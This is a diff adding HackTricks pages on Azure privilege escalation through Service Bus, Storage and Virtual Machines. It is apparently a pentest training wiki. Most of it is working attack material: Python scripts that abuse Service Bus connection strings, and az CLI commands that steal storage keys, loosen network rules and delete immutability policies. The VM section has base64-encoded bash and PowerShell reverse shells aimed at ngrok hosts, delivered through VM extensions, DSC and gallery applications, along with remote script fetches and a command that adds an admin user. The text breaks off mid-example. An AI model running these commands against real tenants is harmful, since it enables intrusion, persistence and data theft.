+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Service Bus
+
+For more information check:
+
+{% content-ref url="../az-services/az-servicebus-enum.md" %}
+[az-servicebus-enum.md](../az-services/az-servicebus-enum.md)
+{% endcontent-ref %}
+
+
+### Send Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
+
+You can retrieve the `PrimaryConnectionString`, which acts as a credential for the Service Bus namespace. With this connection string, you can fully authenticate as the Service Bus namespace, enabling you to send messages to any queue or topic and potentially interact with the system in ways that could disrupt operations, impersonate valid users, or inject malicious data into the messaging workflow.
+
+{% code overflow="wrap" %}
+```python
+#You need to install the following libraries
+#pip install azure-servicebus
+#pip install aiohttp
+#pip install azure-identity
+
+import asyncio
+from azure.servicebus.aio import ServiceBusClient
+from azure.servicebus import ServiceBusMessage
+
+# Constants
+NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
+TOPIC_NAME = "<TOPIC_NAME>"
+
+# Function to send a single message to a Service Bus topic
+async def send_individual_message(publisher):
+    # Prepare a single message with updated content
+    single_message = ServiceBusMessage("Hacktricks-Training: Single Item")
+    # Send the message to the topic
+    await publisher.send_messages(single_message)
+    print("Sent a single message containing 'Hacktricks-Training'")
+
+# Function to send multiple messages to a Service Bus topic
+async def send_multiple_messages(publisher):
+    # Generate a collection of messages with updated content
+    message_list = [ServiceBusMessage(f"Hacktricks-Training: Item {i+1} in list") for i in range(5)]
+    # Send the entire collection of messages to the topic
+    await publisher.send_messages(message_list)
+    print("Sent a list of 5 messages containing 'Hacktricks-Training'")
+
+# Function to send a grouped batch of messages to a Service Bus topic
+async def send_grouped_messages(publisher):
+    # Send a grouped batch of messages with updated content
+    async with publisher:
+        grouped_message_batch = await publisher.create_message_batch()
+        for i in range(10):
+            try:
+                # Append a message to the batch with updated content
+                grouped_message_batch.add_message(ServiceBusMessage(f"Hacktricks-Training: Item {i+1}"))
+            except ValueError:
+                # If batch reaches its size limit, handle by creating another batch
+                break
+        # Dispatch the batch of messages to the topic
+        await publisher.send_messages(grouped_message_batch)
+    print("Sent a batch of 10 messages containing 'Hacktricks-Training'")
+
+# Main function to execute all tasks
+async def execute():
+    # Instantiate the Service Bus client with the connection string
+    async with ServiceBusClient.from_connection_string(
+        conn_str=NAMESPACE_CONNECTION_STR,
+        logging_enable=True) as sb_client:
+        # Create a topic sender for dispatching messages to the topic
+        publisher = sb_client.get_topic_sender(topic_name=TOPIC_NAME)
+        async with publisher:
+            # Send a single message
+            await send_individual_message(publisher)
+            # Send multiple messages
+            await send_multiple_messages(publisher)
+            # Send a batch of messages
+            await send_grouped_messages(publisher)
+
+# Run the asynchronous execution
+asyncio.run(execute())
+print("Messages Sent")
+print("----------------------------")
+
+```
+{% endcode %}
+
+### Recieve Messages. Action: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` OR `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
+You can retrieve the PrimaryConnectionString, which serves as a credential for the Service Bus namespace. Using this connection string, you can receive messages from any queue or subscription within the namespace, allowing access to potentially sensitive or critical data, enabling data exfiltration, or interfering with message processing and application workflows.
+
+{% code overflow="wrap" %}
+```python
+#You need to install the following libraries
+#pip install azure-servicebus
+#pip install aiohttp
+#pip install azure-identity
+
+import asyncio
+from azure.servicebus.aio import ServiceBusClient
+
+NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
+TOPIC_NAME = "<TOPIC_NAME>"
+SUBSCRIPTION_NAME = "<TOPIC_SUBSCRIPTION_NAME>" #Topic Subscription
+
+# Function to receive and process messages from a Service Bus subscription
+async def receive_and_process_messages():
+    # Create a Service Bus client using the connection string
+    async with ServiceBusClient.from_connection_string(
+        conn_str=NAMESPACE_CONNECTION_STR,
+        logging_enable=True) as servicebus_client:
+
+        # Get the Subscription Receiver object for the specified topic and subscription
+        receiver = servicebus_client.get_subscription_receiver(
+            topic_name=TOPIC_NAME, 
+            subscription_name=SUBSCRIPTION_NAME, 
+            max_wait_time=5
+        )
+
+        async with receiver:
+            # Receive messages with a defined maximum wait time and count
+            received_msgs = await receiver.receive_messages(
+                max_wait_time=5, 
+                max_message_count=20
+            )
+            for msg in received_msgs:
+                print("Received: " + str(msg))
+                # Complete the message to remove it from the subscription
+                await receiver.complete_message(msg)
+
+# Run the asynchronous message processing function
+asyncio.run(receive_and_process_messages())
+print("Message Receiving Completed")
+print("----------------------------")
+```
+
+### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
+If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC).
+
+```bash
+az servicebus namespace authorization-rule update \
+    --resource-group <MyResourceGroup> \
+    --namespace-name <MyNamespace> \
+    --name RootManageSharedAccessKey \
+    --rights Manage Listen Send
+```
+
+## References
+
+* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
+* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
+* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
+* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
+* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
new file mode 100644
index 0000000000..ed82ec6376
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
@@ -0,0 +1,180 @@
+# Az - Storage Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Storage Privesc
+
+For more information about storage check:
+
+{% content-ref url="../az-services/az-storage.md" %}
+[az-storage.md](../az-services/az-storage.md)
+{% endcontent-ref %}
+
+### Microsoft.Storage/storageAccounts/listkeys/action
+
+A principal with this permission will be able to list (and the secret values) of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
+
+```bash
+az storage account keys list --account-name <acc-name>
+```
+
+### Microsoft.Storage/storageAccounts/regenerateKey/action
+
+A principal with this permission will be able to renew and get the new secret value of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
+
+Moreover, in the response, the user will get the value of the renewed key and also of the not renewed one:
+
+```bash
+az storage account keys renew --account-name <acc-name> --key key2
+```
+
+### Microsoft.Storage/storageAccounts/write
+
+A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
+
+{% code overflow="wrap" %}
+```bash
+# e.g. set default action to allow so network restrictions are avoided
+az storage account update --name <acc-name> --default-action Allow
+
+# e.g. allow an IP address
+az storage account update --name <acc-name> --add networkRuleSet.ipRules value=<ip-address>
+```
+{% endcode %}
+
+## Blobs Specific privesc
+
+### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete
+
+The first permission allows to **modify immutability policies** in containers and the second to delete them.
+
+{% hint style="info" %}
+Note that if an immutability policy is in lock state, you cannot do neither of both
+{% endhint %}
+
+```bash
+az storage container immutability-policy delete \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --container-name <CONTAINER_NAME> \
+  --resource-group <RESOURCE_GROUP>
+
+az storage container immutability-policy update \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --container-name <CONTAINER_NAME> \
+  --resource-group <RESOURCE_GROUP> \
+  --period <NEW_RETENTION_PERIOD_IN_DAYS>
+```
+
+## File shares specific privesc
+
+### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action
+
+This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem.
+
+### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action
+
+This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem.
+
+### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action
+
+This should allow a user having this permission to be able to perform actions inside a file system as a superuser.
+
+### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
+
+With this permission, an attacker can create and update (if has ```Microsoft.Storage/storageAccounts/localusers/read``` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the user’s permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
+
+{% code overflow="wrap" %}
+```bash
+az storage account local-user create \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --resource-group <RESOURCE_GROUP_NAME> \
+  --name <LOCAL_USER_NAME> \
+  --permission-scope permissions=rwdl service=blob resource-name=<CONTAINER_NAME> \
+  --home-directory <HOME_DIRECTORY> \
+  --has-ssh-key false/true # Depends on the auth method to use
+```
+{% endcode %} 
+
+### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action
+
+With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
+
+{% code overflow="wrap" %}
+```bash
+az storage account local-user regenerate-password \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --resource-group <RESOURCE_GROUP_NAME> \
+  --name <LOCAL_USER_NAME>
+```
+{% endcode %}
+
+To access Azure Blob Storage via SFTP using a local user via SFTP you can (you can also use ssh key to connect):
+
+{% code overflow="wrap" %}
+```bash
+sftp <local-user-name>@<storage-account-name>.blob.core.windows.net
+#regenerated-password
+```
+{% endcode %}
+
+### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
+
+With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
+
+{% code overflow="wrap" %}
+```bash
+#Restore the soft deleted container
+az storage container restore \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --name <CONTAINER_NAME> \
+  --deleted-version <VERSION>
+
+#Restore the soft deleted blob
+az storage blob undelete \
+  --account-name <STORAGE_ACCOUNT_NAME> \
+  --container-name <CONTAINER_NAME> \
+  --name "fileName.txt"
+```
+{% endcode %}
+
+
+## Other interesting looking permissions (TODO)
+
+* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
+* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
+* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
+* Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
+* [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
new file mode 100644
index 0000000000..b558868c53
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -0,0 +1,412 @@
+# Az - Virtual Machines & Network Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image%20(1)%20(1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image%20(1)%20(1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image%20(2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image%20(2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## VMS & Network
+
+For more info about Azure Virtual Machines and Network check:
+
+{% content-ref url="../az-services/vms/" %}
+[vms](../az-services/vms/)
+{% endcontent-ref %}
+
+### **`Microsoft.Compute/virtualMachines/extensions/write`**
+
+This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\
+Example abusing custom extensions to execute arbitrary commands in a VM:
+
+{% tabs %}
+{% tab title="Linux" %}
+* Execute a revers shell
+
+{% code overflow="wrap" %}
+```bash
+# Prepare the rev shell
+echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
+YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==
+
+# Execute rev shell
+az vm extension set \
+  --resource-group <rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScript \
+  --publisher Microsoft.Azure.Extensions \
+  --version 2.1 \
+  --settings '{}' \
+  --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
+```
+{% endcode %}
+
+* Execute a script located on the internet
+
+{% code overflow="wrap" %}
+```bash
+az vm extension set \
+  --resource-group rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScript \
+  --publisher Microsoft.Azure.Extensions \
+  --version 2.1 \
+  --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
+  --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Windows" %}
+* Execute a reverse shell
+
+{% code overflow="wrap" %}
+```bash
+# Get encoded reverse shell
+echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+
+# Execute it
+az vm extension set \
+  --resource-group <rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScriptExtension \
+  --publisher Microsoft.Compute \
+  --version 1.10 \
+  --settings '{}' \
+  --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
+
+```
+{% endcode %}
+
+* Execute reverse shell from file
+
+{% code overflow="wrap" %}
+```bash
+az vm extension set \
+  --resource-group <rsc-group> \
+  --vm-name <vm-name> \
+  --name CustomScriptExtension \
+  --publisher Microsoft.Compute \
+  --version 1.10 \
+  --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
+  --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
+```
+{% endcode %}
+
+You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
+
+* Reset password using the VMAccess extension
+
+{% code overflow="wrap" %}
+```powershell
+# Run VMAccess extension to reset the password
+$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
+Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs:
+
+<details>
+
+<summary>VMAccess extension</summary>
+
+This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
+
+{% code overflow="wrap" %}
+```powershell
+# Run VMAccess extension to reset the password
+$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
+Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
+```
+{% endcode %}
+
+</details>
+
+<details>
+
+<summary>DesiredConfigurationState (DSC)</summary>
+
+This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
+
+```powershell
+# Content of revShell.ps1
+Configuration RevShellConfig {
+    Node localhost {
+        Script ReverseShell {
+            GetScript = { @{} }
+            SetScript = {
+                $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
+                $stream = $client.GetStream();
+                [byte[]]$bytes = 0..65535|%{0};
+                while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
+                    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
+                    $sendback = (iex $data 2>&1 | Out-String );
+                    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
+                    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
+                    $stream.Write($sendbyte, 0, $sendbyte.Length)
+                }
+                $client.Close()
+            }
+            TestScript = { return $false }
+        }
+    }
+}
+RevShellConfig -OutputPath .\Output
+
+# Upload config to blob
+$resourceGroup = 'dscVmDemo'
+$storageName = 'demostorage'
+Publish-AzVMDscConfiguration `
+    -ConfigurationPath .\revShell.ps1 `
+    -ResourceGroupName $resourceGroup `
+    -StorageAccountName $storageName `
+    -Force
+
+# Apply DSC to VM and execute rev shell
+$vmName = 'myVM'
+Set-AzVMDscExtension `
+    -Version '2.76' `
+    -ResourceGroupName $resourceGroup `
+    -VMName $vmName `
+    -ArchiveStorageAccountName $storageName `
+    -ArchiveBlobName 'revShell.ps1.zip' `
+    -AutoUpdate `
+    -ConfigurationName 'RevShellConfig'
+```
+
+</details>
+
+<details>
+
+<summary>Hybrid Runbook Worker</summary>
+
+This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-services/az-automation-account/).
+
+</details>
+
+### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)`
+
+These are the required permissions to **create a new gallery application and execute it inside a VM**. Gallery applications can execute anything so an attacker could abuse this to compromise VM instances executing arbitrary commands.
+
+The last 2 permissions might be avoided by sharing the application with the tenant.
+
+Exploitation example to execute arbitrary commands:
+
+{% tabs %}
+{% tab title="Linux" %}
+```bash
+# Create gallery (if the isn't any)
+az sig create --resource-group myResourceGroup \
+   --gallery-name myGallery --location "West US 2"
+
+# Create application container
+az sig gallery-application create \
+    --application-name myReverseShellApp \
+    --gallery-name myGallery \
+    --resource-group <rsc-group> \
+    --os-type Linux \
+    --location "West US 2"
+
+# Create app version with the rev shell
+## In Package file link just add any link to a blobl storage file
+az sig gallery-application version create \
+   --version-name 1.0.2 \
+   --application-name myReverseShellApp \
+   --gallery-name myGallery \
+   --location "West US 2" \
+   --resource-group <rsc-group> \
+   --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
+   --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
+   --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
+   --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
+
+# Install the app in a VM to execute the rev shell
+## Use the ID given in the previous output
+az vm application set \
+   --resource-group <rsc-group> \
+   --name <vm-name> \
+   --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
+   --treat-deployment-as-failure true
+```
+{% endtab %}
+
+{% tab title="Windows" %}
+{% code overflow="wrap" %}
+```bash
+# Create gallery (if the isn't any)
+az sig create --resource-group <rsc-group> \
+   --gallery-name myGallery --location "West US 2"
+
+# Create application container
+az sig gallery-application create \
+    --application-name myReverseShellAppWin \
+    --gallery-name myGallery \
+    --resource-group <rsc-group> \
+    --os-type Windows \
+    --location "West US 2"
+
+# Get encoded reverse shell
+echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
+
+# Create app version with the rev shell
+## In Package file link just add any link to a blobl storage file
